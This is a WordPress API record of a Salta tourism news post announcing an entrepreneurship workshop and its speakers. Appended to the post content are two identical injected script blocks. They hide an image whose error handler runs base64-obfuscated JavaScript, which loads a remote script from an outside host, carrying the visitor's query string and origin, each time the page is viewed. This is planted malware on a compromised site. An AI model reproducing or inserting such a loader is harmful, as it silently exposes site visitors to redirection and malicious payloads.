{"id":2970,"date":"2023-08-08T13:27:52","date_gmt":"2023-08-08T16:27:52","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2970"},"modified":"2025-08-14T00:10:51","modified_gmt":"2025-08-14T03:10:51","slug":"turismo-realizara-la-jornada-emprendedores-en-accion-por-un-destino-sostenible","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2970","title":{"rendered":"Turismo realizar\u00e1 la jornada Emprendedores en Acci\u00f3n por un Destino Sostenible"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#91082a\"><em>Se llevar\u00e1 a cabo ma\u00f1ana mi\u00e9rcoles 9 en la Usina Cultural, los interesados deben inscribirse en www.turismotecapacita.com.<\/em><\/h3>\n\n\n\n<p>El Ministerio de Turismo y Deportes de Salta, en el marco del programa Turismo te Capacita, llevar\u00e1 a cabo ma\u00f1ana mi\u00e9rcoles 9 la jornada Emprendedores en Acci\u00f3n por un Destino Sostenible de 9 a 13 hs en la Usina Cultural de Salta, Espa\u00f1a 198. Los interesados deben inscribirse en&nbsp;www.turismotecapacita.com.<\/p>\n\n\n\n<p>El encuentro tiene por objetivo propiciar la vinculaci\u00f3n de los emprendimientos para incrementar y fortalecer las habilidades de cooperaci\u00f3n y comunicaci\u00f3n, impulsar los criterios&nbsp; de sostenibilidad en el desarrollo de proyectos tur\u00edsticos y acercar herramientas de cr\u00e9ditos vigentes para el sector tur\u00edstico.<\/p>\n\n\n\n<p>El programa de la jornada es el siguiente:<\/p>\n\n\n\n<p>El hacer emprendedor en Salta, mapa emprendedor &#8211; Expositora: Lic. Cecilia Camou<\/p>\n\n\n\n<p>Conversatorio: Emprendedores en Acci\u00f3n &#8211; Moderan: Lic. Viviana Santin\u00f3n y Lic. Cecilia Camou<\/p>\n\n\n\n<p>\u00bfC\u00f3mo pasar de la idea al negocio? &#8211; Expositor: Jorge Lindon<\/p>\n\n\n\n<p>Tips para Emprender en turismo con \u00e9xito &#8211; Expositor: Marcelo Paz<\/p>\n\n\n\n<p>El ocio desgastado y c\u00f3mo renovar las experiencias tur\u00edsticas &#8211; Expositora: Cecilia Camou<\/p>\n\n\n\n<p>Artesanos de recuerdos. El valor de nuestra historia en la experiencia del cliente &#8211; Expositor: Franco Torres<\/p>\n\n\n\n<p>\u00bfC\u00f3mo me presento al mundo digital? &#8211; Expositor: Nelson Veliz\u00e1n<\/p>\n\n\n\n<p>Turismo y sostenibilidad &#8211; Expositor: Marcelo Molinillo<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/turismo-realizara-la-jornada-emprendedores-en-accion-por-un-destino-sostenible-91053\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Se llevar\u00e1 a cabo ma\u00f1ana mi\u00e9rcoles 9 en la Usina Cultural, los interesados deben inscribirse en www.turismotecapacita.com. El Ministerio de Turismo y Deportes de Salta, en el marco del programa Turismo te Capacita, llevar\u00e1 a cabo ma\u00f1ana mi\u00e9rcoles 9 la jornada Emprendedores en Acci\u00f3n por un Destino Sostenible de 9 a 13 hs en la [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2971,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,15],"tags":[],"class_list":{"0":"post-2970","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-provincial"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2970"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2970"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2970\/revisions"}],"predecessor-version":[{"id":6998,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2970\/revisions\/6998"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2971"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2970"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2970"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2970"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}